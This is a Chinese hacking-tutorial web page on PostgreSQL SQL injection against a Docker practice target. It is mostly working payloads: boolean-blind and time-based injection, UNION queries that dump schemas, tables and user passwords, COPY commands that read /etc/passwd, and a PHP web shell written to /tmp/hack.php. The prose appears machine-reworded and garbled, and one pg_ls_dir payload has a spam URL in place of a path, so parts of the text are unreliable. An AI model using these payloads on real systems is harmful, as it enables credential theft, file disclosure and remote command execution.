您现在的位置是:首页 > 黑客技术

网络黑客学习培训|postgresql注入

作者:果E安全网时间:2020-10-26 00:27:55分类:黑客技术

简介PostgreSQL是一个完全免费的目标-关联数据库网络服务器(ORDBMS),在灵便的BSD许可证书下发售。PostgreSQL开发人员把它念作post-gress-Q-L。PostgreSQL的Slogan是"世界最优秀的开源系统关联型数据库"。这儿大家根据一个简易的射击场来学习培训postgresql数据库有关系统漏洞这儿我们都是运用docker构建的自然环境浏览大家构建的详细地址:根

PostgreSQL 是一个完全免费的目标-关联数据库网络服务器 (ORDBMS),在灵便的 BSD 许可证书下发售。

PostgreSQL 开发人员把它念作 post-gress-Q-L。

PostgreSQL 的 Slogan 是 "世界最优秀的开源系统关联型数据库"。

这儿大家根据一个简易的射击场来学习培训 postgresql 数据库有关系统漏洞

这儿我们都是运用 docker 构建的自然环境

浏览大家构建的详细地址:http://172.16.1.238:90/index.php?uid=1

1599706753.png!small

根据布尔型引入(boolean-based blind)

index.php?uid=1 AND 1=1 运行一切正常

index.php?uid=1 AND 1=2 运行出现异常

1599706771.png!small

1599706779.png!small

获取版本信息:

select * from tbuser where id=1 AND 7778=CAST((SELECT version())::text AS NUMERIC)

1599706790.png!small

获取 Schemas 名称

select * from tbuser where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables limit 1)::text AS NUMERIC)

1599706811.png!small

AND 6489=(SELECT 6489 FROM PG_SLEEP(5)) 廷时 5 秒

1599706829.png!small

?uid=1;select PG_SLEEP(5)--

1599706838.png!small

?uid=1 order by 1,2,3 运行一切正常

?uid=1 order by 1,2,3,4 运行出现异常,获取字段名数 3

?uid=1 UNION ALL SELECT NULL,('11111'),NULL-- 查询是不是輸出 11111

1599706845.png!small

1599706853.png!small

1599706860.png!small

获取数据库构造和內容

这里均为联合查询

获取方式名称(schemaname)名称

?uid=1 UNION SELECT NULL,COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))),NULL FROM pg_tables--

英语的语法分析:

COALESCE(expression[,n]) coalesce 涵数回到主要参数(字段名)中第一个非 NULL 值的字段名值,留意并不是为空''

cast ('1' as numeric) 1 变换为数据种类

简单化:

?uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--

1599706873.png!small

客户建立的数据库默认设置方式名称(schemaname)为 public

获取数据分析表名称

uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')

1599706881.png!small

获取表字段名称

?uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='tbuser' AND nspname='public'—

1599706892.png!small

获取表內容

?uid=1 UNION ALL SELECT NULL,id||','||username||','||passwd,NULL FROM public.tbuser--

1599706909.png!small

PostgreSQL 中一部分内嵌涵数、表

1599706918.png!small

?uid=1 union select NULL,NULL,pg_ls_dir('http://www.联合利华信息平台网.com/articles/web/')

1599706929.png!small

?uid=1;

CREATE TABLE passwd(t TEXT);

COPY passwd FROM '/etc/passwd';

SELECT NULL,t,NULL FROM passwd;

1599706939.png!small

?uid=1;

DROP TABLE pass;(这儿必须为数据库存有的表)

CREATE TABLE hacktb (t TEXT);

INSERT INTO hacktb(t) VALUES ('<?php @system("$_GET[cmd]");?>');

COPY hacktb(t) TO '/tmp/hack.php';

1599706950.png!small

1599706959.png!small

郑重声明:

果E安全网所有活动均为互联网所得,如有侵权请联系本站删除处理,转载请注明本站地址。

我来说两句